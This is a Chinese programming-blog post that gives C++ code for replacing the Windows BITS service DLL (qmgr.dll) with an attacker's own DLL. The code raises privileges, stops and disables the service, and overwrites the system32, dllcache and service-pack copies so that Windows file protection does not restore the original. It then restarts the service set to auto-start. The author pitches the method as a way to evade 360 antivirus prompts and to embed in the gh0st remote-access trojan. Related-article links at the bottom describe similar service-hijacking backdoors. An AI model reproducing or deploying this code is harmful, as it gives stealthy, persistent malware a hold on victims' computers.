替换BITS系统服务代码

最新推荐文章于 2021-08-11 13:00:17 发布
最新推荐文章于 2021-08-11 13:00:17 发布
阅读量2.5k 收藏
点赞数
分类专栏: 编程相关 文章标签: service null token manager 工作 access

PS:这个方法用来过360服务提示是很不错的,放到gh0st里去,再把代码 改下就好了 ^_^

创建了一个类,提供三接口,一个用来启动服务,一个用来停止服务,一个用来调整启动方式滴

 

   1. class CService
   2. {
   3. public:
   4. BOOL SetStartType(DWORD dwOp);
   5. void StopService();
   6. void StartService();
   7. CService(char* szSerName);
   8. virtual ~CService();
   9.

  10. private:
  11. BOOL CloseHandle();
  12. BOOL EnablePriv();
  13. BOOL OpenHandle();
  14. SC_HANDLE m_ser;
  15. SC_HANDLE m_scm;
  16. char m_szSerName[256];
  17. };
  18.

  19. 实现部分的代码
  20.

  21. CService::CService(char *szSerName)
  22. {
  23. memset(m_szSerName,0,256);
  24. strcpy(m_szSerName,szSerName);
  25. }
  26.

  27. CService::~CService()
  28. {
  29.

  30. }
  31.

  32. BOOL CService::OpenHandle()
  33. {
  34. BOOL stat=EnablePriv();
  35. if(!stat)
  36.    return FALSE;
  37. m_scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
  38. if(m_scm==NULL)
  39. {
  40.    return FALSE;
  41. }
  42. m_ser=OpenService(m_scm,m_szSerName,SERVICE_ALL_ACCESS);
  43. if(m_ser==NULL)
  44. {
  45.    return FALSE;
  46. }
  47. else
  48.    return TRUE;
  49. }
  50.

  51. BOOL CService::EnablePriv()
  52. {
  53. HANDLE hToken;
  54. BOOL stat;
  55. stat=OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
  56. if(stat==FALSE)
  57.    return FALSE;
  58.

  59. TOKEN_PRIVILEGES tkp;
  60.

  61. stat=LookupPrivilegeValue( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid );//修改进程权限
  62. if(stat==FALSE)
  63.    return FALSE;
  64. tkp.PrivilegeCount=1;
  65. tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  66. stat=AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL );//通知系统修改进程权限
  67.

  68. return stat;
  69. }
  70.

  71. BOOL CService::CloseHandle()
  72. {
  73. return (CloseServiceHandle(m_scm)&&CloseServiceHandle(m_ser));
  74. }
  75.

  76. void CService::StartService()
  77. {
  78. EnablePriv();
  79. OpenHandle();
  80. ::StartService(m_ser,NULL,NULL);
  81. CloseHandle();
  82. }
  83.

  84. void CService::StopService()
  85. {
  86. EnablePriv();
  87. OpenHandle();
  88. SERVICE_STATUS stat;
  89. ControlService(m_ser,SERVICE_CONTROL_STOP,&stat);
  90. CloseHandle();
  91. }
  92.

  93. BOOL CService::SetStartType(DWORD dwOp)//SERVICE_AUTO_START SERVICE_BOOT_START SERVICE_DEMAND_START SERVICE_DISABLED SERVICE_SYSTEM_START
  94. {
  95. OpenHandle();
  96.     SC_LOCK sclLock=LockServiceDatabase(m_scm);
  97. BOOL stat=ChangeServiceConfig(
  98.    m_ser,
  99.    SERVICE_NO_CHANGE,
 100.    dwOp,
 101.    SERVICE_NO_CHANGE,
 102.    NULL,
 103.    NULL,
 104.    NULL,
 105.    NULL,
 106.    NULL,
 107.    NULL,
 108.    NULL);
 109. UnlockServiceDatabase(sclLock);
 110. CloseHandle();
 111. return stat;
 112. }
 113.

 114.


 115. 替换程序相关的代码
 116.

 117. void ReplaceService(char *szFilePath)//szFilePath是我们自己的DLL文件的位置
 118. {
 119. char temp[256]={0};
 120. GetWindowsDirectory(temp,256);
 121. char szPackPath[256]={0};
 122. strcpy(szPackPath,temp);
 123. strcat(szPackPath,"//ServicePackFiles//i386//qmgr.dll");//这个东东貌似是XP sp3下才存在,开始的时候没注意,一直没替换成功,系统自动还原了,瘦了一下,发现这个地方还有一备份文件。替换了就好了
 124. char szCachePath[256]={0};
 125. strcpy(szCachePath,temp);
 126. strcat(szCachePath,"//system32//dllcache//qmgr.dll");
 127. char szSystemPath[256]={0};
 128. strcpy(szSystemPath,temp);
 129. strcat(szSystemPath,"//system32//qmgr.dll");
 130.

 131. strcat(temp,"//qmgr.cfei");
 132.

 133. MoveFileEx(szCachePath,temp,MOVEFILE_REPLACE_EXISTING);
 134. MoveFileEx(szPackPath,temp,MOVEFILE_REPLACE_EXISTING);
 135. MoveFileEx(szSystemPath,temp,MOVEFILE_REPLACE_EXISTING);
 136. CopyFile(szFilePath,szCachePath,0);
 137. CopyFile(szFilePath,szPackPath,0);
 138. CopyFile(szFilePath,szSystemPath,0);
 139. }
 140.

 141.


 142. 调用部分的代码
 143.

 144. CService ser("bits");
 145. ser.SetStartType(SERVICE_DISABLED);
 146. ser.StopService();
 147.    ReplaceService("c://ser.dll");//这里假设我们的文件释放的位置是c:/ser.dll
 148. ser.SetStartType(SERVICE_AUTO_START);
 149. ser.StartService();

 

当BITS才开始就是启动状态时,系统重新启动后才可以正常工作,如果BITS服务才开始就是停止或者禁用状态,则可以直接工作

服务部分相关的代码都从冷风那抄的咯,只是整理成一个类了,调用方便些而已

machack
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
替换系统svchost服务启动
06-14
替换Svchost共享服务模式启动,,原理是制作导出函数为ServiceMain的动态链接库文件,并在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\SvcHost\netsvcs中查找系统未安装的服务,创建服务后将 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XXX\Parameters\ServiceDll键值改为自己的动态链接库文件路径,实现自启动
替换BITS系统服务
lionzl的专栏
06-15 939
替换BITS系统服务2009-4-9 8:07:34 来源: 转载 作者:vips 录入:vips 访问:点击:276 次 次 被顶:118 次 字号:【大 中 小】核心提示:替换BITS系统服务...创建了一个类,提供三接口,一个用来启动服务,一个用来停止服务,一个用来调整启动方式滴class CService {public:BOOL SetStartType(
随机替换系统服务
yyue的专栏
06-12 1593
 Random Replace Service   RpSrv.exe 配置程序    rps.ini   配置文件    rps.exe   主运行文件        本程序可用来随机替换系统服务,程序RpSrv.exe用来设置RPS.ini,程序rps.exe运行时读取rps.ini中的配置替换相关的服务。配置文件中主文件名必须是可以作为系统服务运行的程序,如r_server.exe,且程序运
替换服务但原服务不失效的方法
tony的专栏
10-25 708
替换系统服务是做后门的一个好办法,ring3实现,稳定可靠,也具有一定的隐蔽性。这里简单说说怎么样使用自己的服务替换系统服务,并且保证原来真实的系统服务不失效。   替换服务,主要有两种常见的办法,第一是修改注册表中对应服务的可执行文件路径,第二个是直接替换服务文件。第一个办法的缺陷是修改注册表,第二个是需要关闭SFC。而他们共有的缺点是替换服务之后原来的老服务就失效了,以至没法替换系统关键服
BITS服务启动的解决方法(win 10)(学习笔记一)
热门推荐
jiayou_chen的博客
07-12 1万+
BITS(后台传输服务)是一个windows组件,它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应调整网络中的传输速度,并且在计算机重新启动或者重新建立网络连接之后自动恢复文件的传输。 而BITS也是属于网络中的一种服务,又是也会存在着打不开或者突然停止工作的情况,而BITS服务的停止也会导致windows更新和微软商店无法正常的工作。 面对BITS服务的停止有着以下的几种解决方法 ...
matlab代码如何加密-serpent:Matlab蛇算法
05-24
在最后一轮替换中,将线性变换替换为回合密钥的其他组合。 最后的排列,称为Per – 1 要求 Matlab版本:R2018b 如何使用它 可以在main.m文件中找到一个工作示例 添加要使用的serpent_functions: addpath("serpent_...
vs2010 串口通信 全部源代码 运行过可用
03-04
串口通信是一种计算机之间或计算机与设备之间交换数据的常用方法,尤其在嵌入式系统和工业自动化领域中广泛应用。 首先,我们需要理解串口通信的基本概念。串口通信,也称为串行通信,是指数据以串行方式逐位传输。...
matlab 读取串口数据及实时显示波形 代码
12-28
在MATLAB中,读取串口数据并实时显示波形是一项常见的任务,特别是在进行嵌入式系统通信或者数据采集时。下面将详细讲解如何利用MATLAB实现这一功能,并结合描述和标签来阐述相关知识点。 首先,MATLAB提供了Serial...
java代码实现短信猫发送短信
11-21
Java代码实现短信猫发送短信是一项常见的通信技术应用,主要用于企业级服务或自动化系统中的通知功能。短信猫(SMS Modem)是一种硬件设备,通过USB或串行接口与计算机连接,可以模拟手机进行短信的收发。本文将详细...
深入理解计算机系统EN
03-29
操作系统是连接硬件和软件的桥梁,它负责调度进程、管理内存、处理输入/输出操作和提供网络通信等服务。了解操作系统原理对于系统级编程和资源管理至关重要。 #### 7.1 进程 进程是正在运行的程序实例,具有独立的...
启动bits工具
06-25
解决windows updrte不能更新的问题
bits不能在本地计算机启动,Win10 BITS服务无法启动的解决方法
weixin_36310141的博客
07-27 2715
Win10中的BITS服务(Background Intelligent Transfer Services服务)如果无法启动可能会导致系统一些问题,如系统卡住可能在你玩游戏的时候。也可能导致账户切换不成功,如本地帐户切换到Windows帐户,提示0x80070422,那么如何解决呢?下面小编给大家带来网官分享的方法。1、遇到0x80070422这样的错误,通常都是由于相关的服务无法启动导致的。不...
win2008服务系统 引导错误,启动 BITS 服务时出现错误 2147944102 - Windows Server | Microsoft Docs...
weixin_39553776的博客
08-11 592
"特定于服务的错误代码 -2147944102"错误消息(如果您尝试启动 BITS 服务)09/10/2020本文内容本文提供了一个解决方案,用于解决在启动 BITS) 服务后台智能传输服务时发生的错误 (2147944102。适用于: Windows Server 2012R2原始 KB 编号: 326460症状如果您尝试在安装了终端服务的基于 Windows 2000 的计算机上启动 B...
收集2:系统服务详解
weixin_33849215的博客
09-14 169
XP系统服务详解,这里应该比较全了,很多也比较详细,需要的可以找找看。。1.Alerter  Alerter(警示器)服务的进程名是Services.exe(即启动这个服务后在后台运行的进程的名称,可以通过任务管理器看到)。Alerter服务的功能是,WinXP将系统上发生的与管理有关的事件以警示(Alert)信息传送至网络上指定的电脑或用户,例如当发生打印错误或硬盘即将写满...
快速找出System.Management.Automation.dll,c#调用powershell
dibeichan3033的博客
05-19 792
public static void InvokeSystemPS(string cmd) { List<string> ps = new List<string>(); ps.Add("Set-ExecutionPolicy RemoteSigned"); ps...
C++ 修改 Windows Service【转】
weixin_30783913的博客
08-10 186
原文:http://msdn.microsoft.com/en-us/library/windows/desktop/ms682006(v=vs.85).aspx // // Purpose: // Disables the service. // // Parameters: // None // // Return value: // None ...
Delphi启动/停止Windows服务,启动类型修改为"自动"
weixin_30654419的博客
04-02 182
unit U_StartServices;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, WinSVC, StdCtrls;type TForm1 = class(TForm) btn_StartServices: TButton...
开启服务并设置服务启动方式
大头的博客
04-12 1867
/*******************************************************************************函数名:OpenServerWithStartTypeByName函数功能:以请求的方式打开服务函数参数: strServerName: 服务名称 nStartType: 启动方式函数返回值: TRUE : 设置成功 FAL...
#include<bits/stdc++.h>怎么变Linux系统上的gcc编译器上使用
最新发布
07-15
要在Linux系统上使用GCC编译器,您可以按照以下步骤进行操作: 1. 确保您的系统已经安装了GCC编译器。如果未安装,可以通过以下命令安装: ``` sudo apt update sudo apt install build-essential ``` 2. 在您的源代码文件中添加 `#include<bits/stdc++.h>` 是不推荐的做法,因为它是非标准的头文件,仅在一些特定的编译器环境中可用。通常建议只包含必要的标准库头文件。 3. 打开终端,导航到存储源代码文件的目录。 4. 使用以下命令来编译您的源代码: ``` g++ your_source_code.cpp -o output_file ``` 这将将您的源代码文件编译为可执行文件,并将其命名为 `output_file`。您可以将其替换为您喜欢的任何输出文件名。 5. 输入以下命令来运行生成的可执行文件: ``` ./output_file ``` 这将执行您的程序并在终端上显示输出。 请注意,上述步骤是用于使用GCC编译器在Linux系统上编译和运行C++源代码的基本步骤。您可以根据需要进行进一步的配置和自定义。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值